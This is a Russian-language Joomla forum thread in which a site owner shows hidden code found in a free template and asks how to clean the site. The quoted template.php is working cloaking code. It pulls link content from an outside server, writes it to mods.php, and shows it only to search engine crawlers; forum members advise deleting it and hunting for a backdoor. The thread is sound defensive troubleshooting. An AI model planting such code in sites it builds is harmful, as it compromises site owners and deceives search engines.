0 Пользователей и 1 Гость просматривают эту тему.
  • 5 Ответов
  • 1621 Просмотров
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Приветствую всех.

Недавно сделал пару сайтов на бесплатных шаблонах (они предлагались как бесплатные не заметил в них вареза, т.к. были очень простыми, не похожие на разработку студии). Скачивал только шаблон и ставил на Full Package 3.0

Случайно посмотрев сохраненную копию страницы своего нового сайта в Google, увидел что стоит внешняя ссылка на сайте на какой-то буржуйский хостинг.

Начал разбираться, заметил:
1. В папке шаблона, в папке HTML есть два файла php:

mods.php с кодом:
Код
<div class="topslide"><p><a target="_blank" title="Reseller Hosting Reviews" href="http://webhostshield.com/reseller-hosting/">Make Money with Reseller Hosting</a></p></div>

template.php с кодом:
Код
<?php
ini_set('display_errors',0);
$path = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$path = str_replace("&", "",$path);
$target = dirname(__FILE__). DIRECTORY_SEPARATOR . "mods.php";
$source = 'http://psdu.net/me11.php?i='.$path;
$cachetime = 86400;
if ((file_exists($target)) && (time() - $cachetime) > filemtime($target)) {    
$string = file_get_contents($source);$result = file_put_contents($target, $string);}
$spiders = array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
$credits = file_get_contents($target);
$uagent = $_SERVER['HTTP_USER_AGENT'];
foreach ($spiders as $spider){if (preg_match("/$spider/",$uagent)){echo $credits;}}
?>

3. Также в index.php шаблона есть вставка:
Код
<div id="post" class="col span_<?php echo $compwidth ?> clr">
                                    <div id="comp-wrap">
                                     <?php include "html/template.php"; ?>                    
                                        <jdoc:include type="message" />
                                        <jdoc:include type="component" />              
                                    </div>
                                </div>

4. в файлах mods.php и template.php не прописана константа, которая пишется обычно в Joomla defined('_JEXEC') or die; также в каталоге с этими файлами отсутствует пустой файл HTML

5. в папке fonts лежит файл .htaccess  с кодом (не уверен что это относится к проблеме, но укажу):
Код
<FilesMatch ".(ttf|otf|eot|woff)$">
  <IfModule mod_headers.c>
    Header set Access-Control-Allow-Origin "*"
  </IfModule>
</FilesMatch>

6. заметил, что ежедневно меняется в одно и тоже время только один файл mods.php (хотя код может оставаться не измененным), остальные файла с момента их закачки на мой сайт не изменяются.

7. Внешняя ссылка на сайте, который лежит на сервере отсутствует, она только в сохраненной копии в базе Google.

Вопросы: правильно ли я понял - в момент прихода гуглбота, а также других ботов указанных в template.php внешняя ссылка записывается в шаблон и уходит в базу поисковика? и как узнать через что происходит перезапись файла mods.php, как закрыть этот доступ ?

Решение по лечению (просьба дополнить и поправить если что-то упустил):

1. Удаляем файлы mods.php и template.php, а также .htaccess

2. Удаляем фрагмент кода из index.php о вставке template.php

3. Проверяем каталоги на предмет отсутствия в них пустых файлов index.html - если не находим, добавляем.

4. Проверяем файлы рhp шаблона на предмет отсутствия в них константы defined('_JEXEC') or die; - если не находим, добавляем.

5. Пишем в поддержку Google чтобы удалили ссылку со страницы в их индексе
« Последнее редактирование: 19.05.2014, 03:55:32 от ap11 »
*

aspidy

  • Завсегдатай
  • 1009
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Все правильно, заодно проверьте файлы в корне .htaccess и robots, Google ничего говорить не нужно, сам переведет
Мелкий ремонт. skype poisk-plus
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Код
array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
это те кто видят вставленные ссылки, для других ботов и пользователей они не формируются, ищите shell или исполнитель, то через что есть доступ к сайту для обновления обработчика mods.php
*

wishlight

  • Живу я здесь
  • 4900
  • 288 / 1
  • от 150 руб быстрый хостинг в Москве
Да. Первый пункт найти уязвимость и удалить скрипты несанкционированного доступа, а то похуже придет. А там не надо быть специалистом, чтобы увидеть, что этот скриптец каждый раз выгружал что ему давали с другого сервера и показывал кому надо.
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Код
array('Googlebot','Yahoo','msnbot','Googlebot-Mobile');
это те кто видят вставленные ссылки, для других ботов и пользователей они не формируются, ищите shell или исполнитель, то через что есть доступ к сайту для обновления обработчика mods.php

shell или исполнитель должен содержать указание на mods.php? прошелся поиском по содержанию файлов сайта - mods.php был указан только в index.php (почистил) и template.php (удалил)
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
shell или исполнитель должен содержать указание на mods.php? прошелся поиском по содержанию файлов сайта - mods.php был указан только в index.php (почистил) и template.php (удалил)
нет указание на mods.php в них может и не быть или закодировано, в index.php и template.php скорей всего была подгрузка содержимого, и если не найти бэкдор (shell) то её пропишут заново
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 99
Просмотров: 57386
Последний ответ 05.07.2017, 15:18:57
от revisium
Не могу найти ссылку

Автор vlmedia

Ответов: 2
Просмотров: 592
Последний ответ 15.02.2016, 21:14:27
от vlmedia
Генерация скрытых ссылок в шаблоне

Автор intedant

Ответов: 16
Просмотров: 1126
Последний ответ 16.01.2016, 03:36:10
от voland
Взломана Joomla, непонятный скрипт

Автор ap11

Ответов: 7
Просмотров: 1437
Последний ответ 22.06.2015, 07:26:40
от winstrool
Как найти и убить чужую спам ссылку?

Автор Yusa

Ответов: 25
Просмотров: 1383
Последний ответ 16.06.2015, 17:25:45
от cyber2